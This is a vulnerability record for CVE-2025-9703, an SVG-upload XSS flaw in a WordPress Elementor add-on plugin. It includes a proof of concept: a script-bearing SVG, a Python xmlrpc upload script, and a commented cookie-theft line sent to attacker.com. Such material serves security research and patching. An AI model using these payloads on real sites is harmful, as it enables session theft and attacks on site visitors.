Security Vulnerability Report
CVE-2025-9703 CVSS 4.3 MEDIUM

Published: 2025-10-06 06:15:37
Last Modified: 2026-04-15 00:35:42

Description

The Ultimate Addons for Elementor (Formerly Elementor Header & Footer Builder) WordPress plugin before 2.5.0 does not sanitize SVG file contents when uploaded through the xmlrpc.php endpoint using base64 encode, leading to a Cross-Site Scripting vulnerability.

CVSS Details

CVSS Score
4.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:U/C:L/I:L/A:L

Configurations (Affected Products)

No CPE configuration data is available for this record. Affected product, per the description: Ultimate Addons for Elementor < 2.5.0 (fixed in 2.5.0).

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
Step 1: Create the SVG file with embedded JavaScript (malicious.svg)

<!-- CVE-2025-9703 PoC: XSS via Unsanitized SVG Upload through xmlrpc.php -->
<svg xmlns="http://www.w3.org/2000/svg" width="100" height="100">
  <script type="text/javascript">
    // Malicious JavaScript payload
    alert('XSS via SVG - CVE-2025-9703');
    // In real attack: steal cookies, redirect users, etc.
    // document.location='http://attacker.com/steal?cookie='+document.cookie;
  </script>
  <!-- Alternative: use event handlers -->
  <circle cx="50" cy="50" r="40" fill="red" onload="alert('XSS via onload event')"/>
</svg>

Step 2: Base64 encode the SVG content

base64 malicious.svg > encoded.txt

Step 3: Upload via xmlrpc.php using an authenticated session (Python PoC)

python
import xmlrpc.client
import base64

# Read malicious SVG content
with open('malicious.svg', 'rb') as f:
    svg_content = f.read()

# Base64 encode the content
encoded_svg = base64.b64encode(svg_content).decode('utf-8')

# Connect to WordPress xmlrpc.php
url = 'http://target-wordpress-site.com/xmlrpc.php'
proxy = xmlrpc.client.ServerProxy(url)

# Upload using wp.uploadFile method (requires authentication)
# Note: Attacker needs valid credentials with appropriate privileges
result = proxy.wp.uploadFile(
    1,           # blog_id
    'admin',     # username
    'password',  # password
    {
        'name': 'malicious.svg',
        'type': 'image/svg+xml',
        'bits': xmlrpc.client.Binary(encoded_svg),
        'overwrite': True
    }
)
print(f"Upload result: {result}")

Step 4: Trigger the XSS by visiting the page containing the uploaded SVG; when a victim loads it, the embedded script executes.

References

https://wpscan.com/vulnerability/4332d49b-d58c-4728-afab-6757ff9e43ee/

Raw JSON Data

JSON
{
  "cve": {
    "id": "CVE-2025-9703",
    "sourceIdentifier": "[email protected]",
    "published": "2025-10-06T06:15:37.177",
    "lastModified": "2026-04-15T00:35:42.020",
    "vulnStatus": "Deferred",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "The Ultimate Addons for Elementor (Formerly Elementor Header & Footer Builder) WordPress plugin before 2.5.0 does not sanitize SVG file contents when uploaded through the xmlrpc.php endpoint using base64 encode, leading to a Cross-Site Scripting vulnerability."
      }
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "type": "Secondary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:U/C:L/I:L/A:L",
            "baseScore": 4.3,
            "baseSeverity": "MEDIUM",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "HIGH",
            "userInteraction": "REQUIRED",
            "scope": "UNCHANGED",
            "confidentialityImpact": "LOW",
            "integrityImpact": "LOW",
            "availabilityImpact": "LOW"
          },
          "exploitabilityScore": 0.9,
          "impactScore": 3.4
        }
      ]
    },
    "references": [
      {
        "url": "https://wpscan.com/vulnerability/4332d49b-d58c-4728-afab-6757ff9e43ee/",
        "source": "[email protected]"
      }
    ]
  }
}